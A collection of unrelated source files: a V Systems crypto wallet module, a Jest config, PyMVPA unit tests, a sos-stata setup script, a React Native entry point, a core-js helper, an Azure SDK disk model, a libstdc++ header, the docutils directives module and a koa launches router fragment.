explorer_address: "https://explorer.v.systems/address",
selected_node: selected_node,
sfx_enabled: false,
vocal_enabled: false,
selected_currency: "usd",
selected_language: "en"
};
all_settings = _merge_object(default_all_settings, settings);
all_settings_db.post({
data: JSON.stringify(all_settings)
});
callback_function(all_settings);
}else { // Update
const stored_settings = JSON.parse(all_setting_doc.data);
all_settings = _merge_object(stored_settings, settings);
all_settings_db.put({
_id: all_setting_doc._id,
_rev: all_setting_doc._rev,
data: JSON.stringify(all_settings)
});
callback_function(all_settings);
}
}
all_settings_db.allDocs({
include_docs: true
}, cache_callback_function);
}
function is_logged() {
return (logged_account !== null);
}
function create_account(password, name, callback_function) {
let seed = _makeId(32);
let new_account = new vsys.Account(network_byte);
new_account.buildFromSeed(seed, 0);
// Encrypt using triplesec
triplesec.encrypt({
data: new triplesec.Buffer(new_account.private_key),
key: new triplesec.Buffer(password)
}, function(error, buffer) {
if(!error) {
let pushed_account = {
name: name,
address: new_account.address,
public_key: new_account.public_key,
encrypted_private_key: buffer.toString('hex')
};
// Push account into DB
accounts_db.put({
_id: pushed_account.address,
data: JSON.stringify(pushed_account),
timestamp: Date.now(),
});
let new_logged_account = {
name: name,
address: new_account.address,
public_key: new_account.public_key,
private_key: new_account.private_key,
encrypted_private_key: buffer.toString('hex')
};
logged_account = new_logged_account;
callback_function(logged_account);
}else {
callback_function(null);
}
});
}
function get_accounts(callback_function) {
function accounts_callback_function(error, response) {
if(!error) {
// Get settings docs
const accounts_docs = response.rows.map(function (row) {
let account = JSON.parse(row.doc.data);
account._rev = row.doc._rev;
return account;
});
callback_function(accounts_docs);
}else {
callback_function(null);
}
}
accounts_db.allDocs({
include_docs: true
}, accounts_callback_function);
}
function change_password(public_key = "", old_password = "", new_password = "", _new_name = "", callback_function) {
function set_new_password(new_account) {
// Encrypt using triplesec
triplesec.encrypt({
data: new triplesec.Buffer(new_account.private_key),
key: new triplesec.Buffer(new_password)
}, function(error, buffer) {
if(!error) {
const account = {
name: _new_name,
address: new_account.address,
public_key: new_account.public_key,
encrypted_private_key: buffer.toString('hex')
};
// Push account into DB
accounts_db.put({
_id: account.address,
_rev: new_account._rev,
data: JSON.stringify(account),
timestamp: Date.now(),
});
logged_account = account;
logged_account.private_key = new_account.private_key;
callback_function(logged_account);
}else {
callback_function(null);
}
});
}
// Find the account in DB
if(public_key !== "" && old_password !== "") {
function accounts_callback_function(all_accounts) {
for(let i = 0; i < all_accounts.length; i++) {
let account = all_accounts[i];
if(account.public_key == public_key) {
// Is it the right password ?
triplesec.decrypt({
data: new triplesec.Buffer(account.encrypted_private_key, "hex"),
key: new triplesec.Buffer(old_password)
}, function (error, buffer) {
if(!error) {
account.private_key = buffer.toString();
logged_account = account;
set_new_password(logged_account);
}else {
callback_function(null);
}
});
}
}
}
get_accounts(accounts_callback_function);
}else {
callback_function(null);
}
}
function login(public_key = "", password = "", callback_function) {
if(public_key == "" && password == "" && logged_account !== null) {
return callback_function(logged_account);
}
// Find the account in DB
if(public_key !== "" && password !== "") {
function accounts_callback_function(all_accounts) {
for(let i = 0; i < all_accounts.length; i++) {
let account = all_accounts[i];
if(account.public_key == public_key) {
// Is it the right password ?
triplesec.decrypt({
data: new triplesec.Buffer(account.encrypted_private_key, "hex"),
key: new triplesec.Buffer(password)
}, function (error, buffer) {
if(!error) {
account.private_key = buffer.toString();
logged_account = {
name: account.name,
address: account.address,
public_key: account.public_key,
private_key: account.private_key,
encrypted_private_key: account.encrypted_private_key
};
callback_function(logged_account);
}else {
callback_function(null);
}
});
}
}
}
get_accounts(accounts_callback_function);
}else {
callback_function(null);
}
}
function login_from_backup(account = "", password = "", callback_function) {
function compare_private_public_key(account) {
// Create new account by private key
let account_from_pk = new vsys.Account(network_byte);
account_from_pk.buildFromPrivateKey(account.private_key);
if(account_from_pk.public_key == account.public_key) {
// Push account in DB
const new_account = {
address: account.address,
public_key: account.public_key,
encrypted_private_key: account.encrypted_private_key
};
try {
accounts_db.put({
_id: new_account.address,
data: JSON.stringify(account),
timestamp: Date.now(),
});
} catch (error) {
}
logged_account = {
name: account.name,
address: account.address,
public_key: account.public_key,
private_key: account.private_key,
encrypted_private_key: account.encrypted_private_key
};
callback_function(logged_account);
}else {
callback_function(null);
}
}
// Decrypt private key
triplesec.decrypt({
data: new triplesec.Buffer(account.encrypted_private_key, "hex"),
key: new triplesec.Buffer(password)
}, function (error, buffer) {
if(!error) {
account.private_key = buffer.toString();
compare_private_public_key(account);
}else {
callback_function(null);
}
});
}
function logout(address = "", callback_function = function(){}) {
logged_account = null;
callback_function(logged_account);
}
function delete_accounts(callback_function) {
accounts_db.allDocs().then(function (result) {
result.rows.map(function (row) {
accounts_db.remove(row.id, row.value.rev);
});
}).then(function () {
callback_function(true);
}).catch(function (err) {
callback_function(error);
});
}
function get_balance(address = "", callback_function) {
const query_id = "get_balance_" + address;
const cache_time = 1 * 1000;
query_db.get(query_id, function(err, doc) {
if (!err) {
// Test if recent
if(doc.timestamp + cache_time >= Date.now() || !navigator.onLine) {
callback_function(doc.balance);
}else { // if old update
chain.getBalance(address).then(response => {
const formatted_balance = _format_amount(response.balance);
query_db.put({
_id: doc._id,
_rev: doc._rev,
timestamp: Date.now(),
balance: formatted_balance
});
callback_function(formatted_balance);
}, respError => {
callback_function(null);
});
}
}else {
// Get data from network
chain.getBalance(address).then(response => {
const formatted_balance = _format_amount(response.balance);
query_db.put({
_id: query_id,
timestamp: Date.now(),
balance: formatted_balance
});
callback_function(formatted_balance);
}, respError => {
callback_function(null);
});
}
});
}
function get_transactions(address = "", number_of_record = 0, offset = 0, callback_function) {
const query_id = "get_transactions_" + address + "_" + number_of_record + "_" + offset;
const cache_time = 1 * 1000;
query_db.get(query_id, function(err, doc) {
if (!err) {
// Test if recent
if(doc.timestamp + cache_time >= Date.now() || !navigator.onLine) {
const formated_transactions = clean_json_text(doc.transactions);
callback_function(JSON.parse(formated_transactions));
}else { // if old update
chain.getTxByType(address, number_of_record, TX_TYPE, offset).then(response => {
if(typeof response["transactions"] !== "undefined") {
const formated_transactions = response["transactions"].map(transaction => _format_transaction(transaction));
query_db.put({
_id: doc._id,
_rev: doc._rev,
timestamp: Date.now(),
transactions: JSON.stringify(formated_transactions)
});
callback_function(formated_transactions);
}else {
callback_function(null);
}
}, respError => {
callback_function(null);
});
}
}else {
// Get data from network
chain.getTxByType(address, number_of_record, TX_TYPE, offset).then(response => {
if(typeof response["transactions"] !== "undefined") {
const formated_transactions = response["transactions"].map(transaction => _format_transaction(transaction));
query_db.put({
_id: query_id,
timestamp: Date.now(),
transactions: JSON.stringify(formated_transactions)
});
callback_function(formated_transactions);
}else {
callback_function(null);
}
}, respError => {
callback_function(null);
});
}
});
}
function send_transaction(private_key, address, amount, memo, callback_function) {
let transaction = new vsys.Transaction(network_byte);
let account = new vsys.Account(network_byte);
account.buildFromPrivateKey(private_key);
const public_key = account.getPublicKey();
const timestamp = Date.now() * 1e6;
transaction.buildPaymentTx(public_key, address, amount, memo, timestamp);
const bytes = transaction.toBytes();
const signature = account.getSignature(bytes);
const send_transaction = transaction.toJsonForSendingTx(signature);
account.sendTransaction(chain, send_transaction).then(response => {
callback_function(response);
}, respError => {
callback_function(null);
});
}
function get_currencies_change(callback_function) {
const query_id = "get_currencies_change";
const cache_time = 60 * 1000;
const crypto_id = "v-systems";
const currencies_string = CURRENCIES.join(",");
const url="https://api.coingecko.com/api/v3/simple/price?ids=" + crypto_id + "&vs_currencies=" + currencies_string;
query_db.get(query_id, function(err, doc) {
if (!err) {
// Test if recent
if(doc.timestamp + cache_time >= Date.now() || !navigator.onLine) {
const currencies_change = clean_json_text(doc.change);
callback_function(JSON.parse(currencies_change));
}else { // if old update
_loadJSON(url, function (response) {
const currencies_change = response[crypto_id];
query_db.put({
_id: query_id,
_rev: doc._rev,
timestamp: Date.now(),
change: JSON.stringify(currencies_change)
});
callback_function(currencies_change);
});
}
}else {
// Get data from network
_loadJSON(url, function (response) {
const currencies_change = response[crypto_id];
query_db.put({
_id: query_id,
timestamp: Date.now(),
change: JSON.stringify(currencies_change)
});
callback_function(currencies_change);
});
}
});
}
module.exports = {
get_settings: get_settings,
set_settings: set_settings,
create_account: create_account,
get_accounts: get_accounts,
login: login,
is_logged: is_logged,
login_from_backup: login_from_backup,
change_password: change_password,
delete_accounts: delete_accounts,
logout: logout,
get_balance: get_balance,
get_transactions: get_transactions,
send_transaction: send_transaction,
get_currencies_change: get_currencies_change
};
|
module.exports = {
roots: ['<rootDir>/src'],
collectCoverage: true,
coverageDirectory: "coverage/",
errorOnDeprecated: true,
transform: {
'^.+\\.ts$': 'ts-jest',
},
testEnvironment: "node",
testRegex: '.*\\.test.ts?$',
testPathIgnorePatterns: [
'<rootDir>/node_modules',
'<rootDir>/lib',
]
}
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the PyMVPA package for the
# copyright and license terms.
#
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Unit tests for dCOV and associated functions"""
from mvpa2.testing import *
# For testing
from nose.tools import ok_
from numpy.testing import assert_array_almost_equal
from mvpa2.testing.datasets import get_random_rotation
from mvpa2.misc.dcov import _euclidean_distances, dCOV, dcorcoef
from mvpa2.base import externals
if externals.exists('cran-energy'):
from mvpa2.misc.dcov import dCOV_R
@reseed_rng()
def test_euclidean_distances():
x = np.random.normal(size=(4, 10)) + np.random.normal() * 10
d = _euclidean_distances(x, uv=True)
# trust no one!
distances = np.zeros((4, 10, 10))
for ix, x_ in enumerate(x.T):
for iy, y_ in enumerate(x.T):
distances[:, ix, iy] = np.sqrt((x_ - y_) ** 2)
assert_array_equal(d, distances)
def test_dCOV_against_R_energy():
skip_if_no_external('cran-energy')
for N in xrange(1, 10): # sweep through size of the first data
# We will compare to R implementation
M, T = 4, 30
x = np.random.normal(size=(N, T)) + np.random.normal() * 10
R = np.random.normal(size=(N, M))
y = 10 * np.dot(R.T, x) + np.random.normal(size=(M, T)) \
+ np.random.normal(size=(M,))[:, None] # offset
# To assure that works for not all_est
pdCovs = dCOV(x, y, all_est=False)
dCovs = dCOV_R(x, y, all_est=False)
assert_array_almost_equal(pdCovs, dCovs)
for uv in True, False:
for out, outp in zip(dCOV_R(x, y, uv=uv),
dCOV(x, y, uv=uv)):
assert_array_almost_equal(out, outp)
@labile(5, 1)
def test_dCOV():
# Few simple tests to verify that the measure seems to be ok
for N in xrange(1, 10): # sweep through size of the first data
# We will compare to R implementation
M, T = 4, 100
x = np.random.normal(size=(N, T)) + np.random.normal() * 10
R = np.random.normal(size=(N, M))
# linearly dependent variable after rotation
dCov, dCor, _, _ = dCOV(x, 10 * np.dot(R.T, x))
ok_(dCor > 0.7) # should be really high but might fluctuate
# completely independent variable
dCov, dCor, _, _ = dCOV(x, np.random.normal(size=x.shape))
# more dimension in x -- more uncertainty that they are
# independent below is a heuristic (for T=100) and we should
# just implement proper bootstrap significance estimation for
# dCor
ok_(dCor < 0.2 + N / 2.0) # should be really high but might fluctuate
# the same variable -- things should match for dCov and dVar's
dCov, dCor, dVarx, dVary = dCOV(x, x)
assert_equal(dCov, dVarx)
assert_equal(dCov, dVary)
assert_equal(dCor, 1.)
assert_equal(dcorcoef(x, x), 1)
#+ np.random.normal(size=(M, T)) \
# + np.random.normal(size=(M,))[:, None] # offset
# Test that would work on vectors
dCov, dCor, dVarx, dVary = dCOV(np.arange(N), np.sin(np.arange(N) / 3.))
if N > 1:
ok_(dCor > 0.6) # should be really high but might fluctuate
assert_equal(dcorcoef(np.arange(N), np.sin(np.arange(N) / 3.)), dCor)
|
#!/usr/bin/env javascript
#
# Copyright (c) Bo Peng and the University of Texas MD Anderson Cancer Center
# Distributed under the terms of the 3-clause BSD License.
from setuptools import find_packages, setup
# obtain version of SoS
with open('src/sos_stata/_version.py') as version:
for line in version:
if line.startswith('__version__'):
__version__ = eval(line.split('=')[1])
break
setup(name = "sos-stata",
version = __version__,
description = 'SoS Notebook extension for Stata',
author = 'Bo Peng',
url = 'https://github.com/vatlab/sos-stata',
author_email = 'bpeng@mdanderson.org',
maintainer = 'Bo Peng',
maintainer_email = 'bpeng@mdanderson.org',
license = '3-clause BSD',
include_package_data = True,
classifiers = [
'Development Status :: 4 - Beta',
'Environment :: Console',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: Implementation :: CPython',
],
packages = find_packages('src'),
package_dir = {'': 'src'},
install_requires=[
'sos>=0.18.0',
'sos-notebook>=0.18.0'
],
entry_points= '''
[sos_languages]
Stata = sos_stata.kernel:sos_stata
'''
)
|
import {Provider} from 'react-redux';
import store from './src/redux/store';
import AppViewContainer from './src/modules/AppViewContainer';
import React, {Component} from 'react';
import {AppRegistry, BackAndroid} from 'react-native';
import {NavigationActions} from 'react-navigation';
class flapjacks extends Component {
componentWillMount() {
BackAndroid.addEventListener('hardwareBackPress', this.navigateBack);
}
navigateBack() {
const navigatorState = store.getState().get('navigatorState');
const currentStackScreen = navigatorState.get('index');
const currentTab = navigatorState.getIn(['routes', 0, 'index']);
if (currentTab !== 0 || currentStackScreen !== 0) {
store.dispatch(NavigationActions.back());
return true;
}
// otherwise let OS handle the back button action
return false;
}
render() {
return (
<Provider store={store}>
<AppViewContainer />
</Provider>
);
}
}
AppRegistry.registerComponent('flapjacks', () => flapjacks);
|
var metadata = require('./_metadata')
, anObject = require('./_an-object')
, ordinaryHasOwnMetadata = metadata.has
, toMetaKey = metadata.key;
metadata.exp({hasOwnMetadata: function hasOwnMetadata(metadataKey, target /*, targetKey */){
return ordinaryHasOwnMetadata(metadataKey, anObject(target)
, arguments.length < 3 ? undefined : toMetaKey(arguments[2]));
}});
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class OSDisk(Model):
"""Specifies information about the operating system disk used by the virtual
machine. <br><br> For more information about disks, see [About disks and
VHDs for Azure virtual
machines](https://docs.microsoft.com/azure/virtual-machines/virtual-machines-windows-about-disks-vhds?toc=%2fazure%2fvirtual-machines%2fwindows%2ftoc.json).
All required parameters must be populated in order to send to Azure.
:param os_type: This property allows you to specify the type of the OS
that is included in the disk if creating a VM from user-image or a
specialized VHD. <br><br> Possible values are: <br><br> **Windows**
<br><br> **Linux**. Possible values include: 'Windows', 'Linux'
:type os_type: str or
~azure.mgmt.compute.v2016_04_30_preview.models.OperatingSystemTypes
:param encryption_settings: Specifies the encryption settings for the OS
Disk. <br><br> Minimum api-version: 2015-06-15
:type encryption_settings:
~azure.mgmt.compute.v2016_04_30_preview.models.DiskEncryptionSettings
:param name: The disk name.
:type name: str
:param vhd: The virtual hard disk.
:type vhd: ~azure.mgmt.compute.v2016_04_30_preview.models.VirtualHardDisk
:param image: The source user image virtual hard disk. The virtual hard
disk will be copied before being attached to the virtual machine. If
SourceImage is provided, the destination virtual hard drive must not
exist.
:type image:
~azure.mgmt.compute.v2016_04_30_preview.models.VirtualHardDisk
:param caching: Specifies the caching requirements. <br><br> Possible
values are: <br><br> **None** <br><br> **ReadOnly** <br><br> **ReadWrite**
<br><br> Default: **None for Standard storage. ReadOnly for Premium
storage**. Possible values include: 'None', 'ReadOnly', 'ReadWrite'
:type caching: str or
~azure.mgmt.compute.v2016_04_30_preview.models.CachingTypes
:param create_option: Required. Specifies how the virtual machine should
be created.<br><br> Possible values are:<br><br> **Attach** \\u2013 This
value is used when you are using a specialized disk to create the virtual
machine.<br><br> **FromImage** \\u2013 This value is used when you are
using an image to create the virtual machine. If you are using a platform
image, you also use the imageReference element described above. If you are
using a marketplace image, you also use the plan element previously
described. Possible values include: 'FromImage', 'Empty', 'Attach'
:type create_option: str or
~azure.mgmt.compute.v2016_04_30_preview.models.DiskCreateOptionTypes
:param disk_size_gb: Specifies the size of an empty data disk in
gigabytes. This element can be used to overwrite the size of the disk in a
virtual machine image. <br><br> This value cannot be larger than 1023 GB
:type disk_size_gb: int
:param managed_disk: The managed disk parameters.
:type managed_disk:
~azure.mgmt.compute.v2016_04_30_preview.models.ManagedDiskParameters
"""
_validation = {
'create_option': {'required': True},
}
_attribute_map = {
'os_type': {'key': 'osType', 'type': 'OperatingSystemTypes'},
'encryption_settings': {'key': 'encryptionSettings', 'type': 'DiskEncryptionSettings'},
'name': {'key': 'name', 'type': 'str'},
'vhd': {'key': 'vhd', 'type': 'VirtualHardDisk'},
'image': {'key': 'image', 'type': 'VirtualHardDisk'},
'caching': {'key': 'caching', 'type': 'CachingTypes'},
'create_option': {'key': 'createOption', 'type': 'DiskCreateOptionTypes'},
'disk_size_gb': {'key': 'diskSizeGB', 'type': 'int'},
'managed_disk': {'key': 'managedDisk', 'type': 'ManagedDiskParameters'},
}
def __init__(self, *, create_option, os_type=None, encryption_settings=None, name: str=None, vhd=None, image=None, caching=None, disk_size_gb: int=None, managed_disk=None, **kwargs) -> None:
super(OSDisk, self).__init__(**kwargs)
self.os_type = os_type
self.encryption_settings = encryption_settings
self.name = name
self.vhd = vhd
self.image = image
self.caching = caching
self.create_option = create_option
self.disk_size_gb = disk_size_gb
self.managed_disk = managed_disk
|
// Base to std::allocator -*- C++ -*-
// Copyright (C) 2004-2020 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the
// terms of the GNU General Public License as published by the
// Free Software Foundation; either version 3, or (at your option)
// any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// Under Section 7 of GPL version 3, you are granted additional
// permissions described in the GCC Runtime Library Exception, version
// 3.1, as published by the Free Software Foundation.
// You should have received a copy of the GNU General Public License and
// a copy of the GCC Runtime Library Exception along with this program;
// see the files COPYING3 and COPYING.RUNTIME respectively. If not, see
// <http://www.gnu.org/licenses/>.
/** @file bits/c++allocator.h
* This is an internal header file, included by other library headers.
* Do not attempt to use it directly. @headername{memory}
*/
#ifndef _GLIBCXX_CXX_ALLOCATOR_H
#define _GLIBCXX_CXX_ALLOCATOR_H 1
#include <ext/pool_allocator.h>
#if __cplusplus >= 201103L
namespace std
{
/**
* @brief An alias to the base class for std::allocator.
* @ingroup allocators
*
* Used to set the std::allocator base class to
* __gnu_cxx::__pool_alloc.
*
* @tparam _Tp Type of allocated object.
*/
template<typename _Tp>
using __allocator_base = __gnu_cxx::__pool_alloc<_Tp>;
}
#else
// Define __pool_alloc as the base class to std::allocator.
# define __allocator_base __gnu_cxx::__pool_alloc
#endif
#endif
|
# Author: David Goodger
# Contact: goodger@python.org
# Revision: $Revision: 4229 $
# Date: $Date: 2005-12-23 00:46:16 +0100 (Fri, 23 Dec 2005) $
# Copyright: This module has been placed in the public domain.
"""
This package contains directive implementation modules.
The interface for directive functions is as follows::
def directive_fn(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
code...
# Set function attributes:
directive_fn.arguments = ...
directive_fn.options = ...
direcitve_fn.content = ...
Parameters:
- ``name`` is the directive type or name (string).
- ``arguments`` is a list of positional arguments (strings).
- ``options`` is a dictionary mapping option names (strings) to values (type
depends on option conversion functions; see below).
- ``content`` is a list of strings, the directive content.
- ``lineno`` is the line number of the first line of the directive.
- ``content_offset`` is the line offset of the first line of the content from
the beginning of the current input. Used when initiating a nested parse.
- ``block_text`` is a string containing the entire directive. Include it as
the content of a literal block in a system message if there is a problem.
- ``state`` is the state which called the directive function.
- ``state_machine`` is the state machine which controls the state which called
the directive function.
Function attributes, interpreted by the directive parser (which calls the
directive function):
- ``arguments``: A 3-tuple specifying the expected positional arguments, or
``None`` if the directive has no arguments. The 3 items in the tuple are
``(required, optional, whitespace OK in last argument)``:
1. The number of required arguments.
2. The number of optional arguments.
3. A boolean, indicating if the final argument may contain whitespace.
Arguments are normally single whitespace-separated words. The final
argument may contain whitespace if the third item in the argument spec tuple
is 1/True. If the form of the arguments is more complex, specify only one
argument (either required or optional) and indicate that final whitespace is
OK; the client code must do any context-sensitive parsing.
- ``options``: A dictionary, mapping known option names to conversion
functions such as `int` or `float`. ``None`` or an empty dict implies no
options to parse. Several directive option conversion functions are defined
in this module.
Option conversion functions take a single parameter, the option argument (a
string or ``None``), validate it and/or convert it to the appropriate form.
Conversion functions may raise ``ValueError`` and ``TypeError`` exceptions.
- ``content``: A boolean; true if content is allowed. Client code must handle
the case where content is required but not supplied (an empty content list
will be supplied).
Directive functions return a list of nodes which will be inserted into the
document tree at the point where the directive was encountered (can be an
empty list).
See `Creating reStructuredText Directives`_ for more information.
.. _Creating reStructuredText Directives:
http://docutils.sourceforge.net/docs/howto/rst-directives.html
"""
__docformat__ = 'reStructuredText'
import re
import codecs
from docutils import nodes
from docutils.parsers.rst.languages import en as _fallback_language_module
_directive_registry = {
'attention': ('admonitions', 'attention'),
'caution': ('admonitions', 'caution'),
'danger': ('admonitions', 'danger'),
'error': ('admonitions', 'error'),
'important': ('admonitions', 'important'),
'note': ('admonitions', 'note'),
'tip': ('admonitions', 'tip'),
'hint': ('admonitions', 'hint'),
'warning': ('admonitions', 'warning'),
'admonition': ('admonitions', 'admonition'),
'sidebar': ('body', 'sidebar'),
'topic': ('body', 'topic'),
'line-block': ('body', 'line_block'),
'parsed-literal': ('body', 'parsed_literal'),
'rubric': ('body', 'rubric'),
'epigraph': ('body', 'epigraph'),
'highlights': ('body', 'highlights'),
'pull-quote': ('body', 'pull_quote'),
'compound': ('body', 'compound'),
'container': ('body', 'container'),
#'questions': ('body', 'question_list'),
'table': ('tables', 'table'),
'csv-table': ('tables', 'csv_table'),
'list-table': ('tables', 'list_table'),
'image': ('images', 'image'),
'figure': ('images', 'figure'),
'contents': ('parts', 'contents'),
'sectnum': ('parts', 'sectnum'),
'header': ('parts', 'header'),
'footer': ('parts', 'footer'),
#'footnotes': ('parts', 'footnotes'),
#'citations': ('parts', 'citations'),
'target-notes': ('references', 'target_notes'),
'meta': ('html', 'meta'),
#'imagemap': ('html', 'imagemap'),
'raw': ('misc', 'raw'),
'include': ('misc', 'include'),
'replace': ('misc', 'replace'),
'unicode': ('misc', 'unicode_directive'),
'class': ('misc', 'class_directive'),
'role': ('misc', 'role'),
'default-role': ('misc', 'default_role'),
'title': ('misc', 'title'),
'date': ('misc', 'date'),
'restructuredtext-test-directive': ('misc', 'directive_test_function'),}
"""Mapping of directive name to (module name, function name). The directive
name is canonical & must be lowercase. Language-dependent names are defined
in the ``language`` subpackage."""
_modules = {}
"""Cache of imported directive modules."""
_directives = {}
"""Cache of imported directive functions."""
def directive(directive_name, language_module, document):
"""
Locate and return a directive function from its language-dependent name.
If not found in the current language, check English. Return None if the
named directive cannot be found.
"""
normname = directive_name.lower()
messages = []
msg_text = []
if _directives.has_key(normname):
return _directives[normname], messages
canonicalname = None
try:
canonicalname = language_module.directives[normname]
except AttributeError, error:
msg_text.append('Problem retrieving directive entry from language '
'module %r: %s.' % (language_module, error))
except KeyError:
msg_text.append('No directive entry for "%s" in module "%s".'
% (directive_name, language_module.__name__))
if not canonicalname:
try:
canonicalname = _fallback_language_module.directives[normname]
msg_text.append('Using English fallback for directive "%s".'
% directive_name)
except KeyError:
msg_text.append('Trying "%s" as canonical directive name.'
% directive_name)
# The canonical name should be an English name, but just in case:
canonicalname = normname
if msg_text:
message = document.reporter.info(
'\n'.join(msg_text), line=document.current_line)
messages.append(message)
try:
modulename, functionname = _directive_registry[canonicalname]
except KeyError:
# Error handling done by caller.
return None, messages
if _modules.has_key(modulename):
module = _modules[modulename]
else:
try:
module = __import__(modulename, globals(), locals())
except ImportError, detail:
messages.append(document.reporter.error(
'Error importing directive module "%s" (directive "%s"):\n%s'
% (modulename, directive_name, detail),
line=document.current_line))
return None, messages
try:
function = getattr(module, functionname)
_directives[normname] = function
except AttributeError:
messages.append(document.reporter.error(
'No function "%s" in module "%s" (directive "%s").'
% (functionname, modulename, directive_name),
line=document.current_line))
return None, messages
return function, messages
def register_directive(name, directive_function):
"""
Register a nonstandard application-defined directive function.
Language lookups are not needed for such functions.
"""
_directives[name] = directive_function
def flag(argument):
"""
Check for a valid flag option (no argument) and return ``None``.
(Directive option conversion function.)
Raise ``ValueError`` if an argument is found.
"""
if argument and argument.strip():
raise ValueError('no argument is allowed; "%s" supplied' % argument)
else:
return None
def unchanged_required(argument):
"""
Return the argument text, unchanged.
(Directive option conversion function.)
Raise ``ValueError`` if no argument is found.
"""
if argument is None:
raise ValueError('argument required but none supplied')
else:
return argument # unchanged!
def unchanged(argument):
"""
Return the argument text, unchanged.
(Directive option conversion function.)
No argument implies empty string ("").
"""
if argument is None:
return u''
else:
return argument # unchanged!
def path(argument):
"""
Return the path argument unwrapped (with newlines removed).
(Directive option conversion function.)
Raise ``ValueError`` if no argument is found.
"""
if argument is None:
raise ValueError('argument required but none supplied')
else:
path = ''.join([s.strip() for s in argument.splitlines()])
return path
def uri(argument):
"""
Return the URI argument with whitespace removed.
(Directive option conversion function.)
Raise ``ValueError`` if no argument is found.
"""
if argument is None:
raise ValueError('argument required but none supplied')
else:
uri = ''.join(argument.split())
return uri
def nonnegative_int(argument):
"""
Check for a nonnegative integer argument; raise ``ValueError`` if not.
(Directive option conversion function.)
"""
value = int(argument)
if value < 0:
raise ValueError('negative value; must be positive or zero')
return value
length_units = ['em', 'ex', 'px', 'in', 'cm', 'mm', 'pt', 'pc']
def get_measure(argument, units):
"""
Check for a positive argument of one of the units and return a
normalized string of the form "<value><unit>" (without space in
between).
To be called from directive option conversion functions.
"""
match = re.match(r'^([0-9.]+) *(%s)$' % '|'.join(units), argument)
try:
assert match is not None
float(match.group(1))
except (AssertionError, ValueError):
raise ValueError(
'not a positive measure of one of the following units:\n%s'
% ' '.join(['"%s"' % i for i in units]))
return match.group(1) + match.group(2)
def length_or_unitless(argument):
return get_measure(argument, length_units + [''])
def length_or_percentage_or_unitless(argument):
return get_measure(argument, length_units + ['%', ''])
def class_option(argument):
"""
Convert the argument into a list of ID-compatible strings and return it.
(Directive option conversion function.)
Raise ``ValueError`` if no argument is found.
"""
if argument is None:
raise ValueError('argument required but none supplied')
names = argument.split()
class_names = []
for name in names:
class_name = nodes.make_id(name)
if not class_name:
raise ValueError('cannot make "%s" into a class name' % name)
class_names.append(class_name)
return class_names
unicode_pattern = re.compile(
r'(?:0x|x|\\x|U\+?|\\u)([0-9a-f]+)$|&#x([0-9a-f]+);$', re.IGNORECASE)
def unicode_code(code):
r"""
Convert a Unicode character code to a Unicode character.
(Directive option conversion function.)
Codes may be decimal numbers, hexadecimal numbers (prefixed by ``0x``,
``x``, ``\x``, ``U+``, ``u``, or ``\u``; e.g. ``U+262E``), or XML-style
numeric character entities (e.g. ``☮``). Other text remains as-is.
Raise ValueError for illegal Unicode code values.
"""
try:
if code.isdigit(): # decimal number
return unichr(int(code))
else:
match = unicode_pattern.match(code)
if match: # hex number
value = match.group(1) or match.group(2)
return unichr(int(value, 16))
else: # other text
return code
except OverflowError, detail:
raise ValueError('code too large (%s)' % detail)
def single_char_or_unicode(argument):
"""
A single character is returned as-is. Unicode characters codes are
converted as in `unicode_code`. (Directive option conversion function.)
"""
char = unicode_code(argument)
if len(char) > 1:
raise ValueError('%r invalid; must be a single character or '
'a Unicode code' % char)
return char
def single_char_or_whitespace_or_unicode(argument):
"""
As with `single_char_or_unicode`, but "tab" and "space" are also supported.
(Directive option conversion function.)
"""
if argument == 'tab':
char = '\t'
elif argument == 'space':
char = ' '
else:
char = single_char_or_unicode(argument)
return char
def positive_int(argument):
"""
Converts the argument into an integer. Raises ValueError for negative,
zero, or non-integer values. (Directive option conversion function.)
"""
value = int(argument)
if value < 1:
raise ValueError('negative or zero value; must be positive')
return value
def positive_int_list(argument):
"""
Converts a space- or comma-separated list of values into a Python list
of integers.
(Directive option conversion function.)
Raises ValueError for non-positive-integer values.
"""
if ',' in argument:
entries = argument.split(',')
else:
entries = argument.split()
return [positive_int(entry) for entry in entries]
def encoding(argument):
"""
Verfies the encoding argument by lookup.
(Directive option conversion function.)
Raises ValueError for unknown encodings.
"""
try:
codecs.lookup(argument)
except LookupError:
raise ValueError('unknown encoding: "%s"' % argument)
return argument
def choice(argument, values):
"""
Directive option utility function, supplied to enable options whose
argument must be a member of a finite set of possible values (must be
lower case). A custom conversion function must be written to use it. For
example::
from docutils.parsers.rst import directives
def yesno(argument):
return directives.choice(argument, ('yes', 'no'))
Raise ``ValueError`` if no argument is found or if the argument's value is
not valid (not an entry in the supplied list).
"""
try:
value = argument.lower().strip()
except AttributeError:
raise ValueError('must supply an argument; choose from %s'
% format_values(values))
if value in values:
return value
else:
raise ValueError('"%s" unknown; choose from %s'
% (argument, format_values(values)))
def format_values(values):
return '%s, or "%s"' % (', '.join(['"%s"' % s for s in values[:-1]]),
values[-1])
|
// Launches Endpoints
const Router = require('koa-router');
const launches = require('../../controllers/v3/launches');
const v3 = new Router({
prefix: '/v3/launches',
});
// Return all past and upcoming launches
v3.get('/', launches.all);
// Return most recent launch
v3.get('/latest', launches.latest);
// Return next launch
v3.get('/next', launches.next);
// Return upcoming launches
v3.get('/upcoming', launches.upcoming);
// Return all past launches
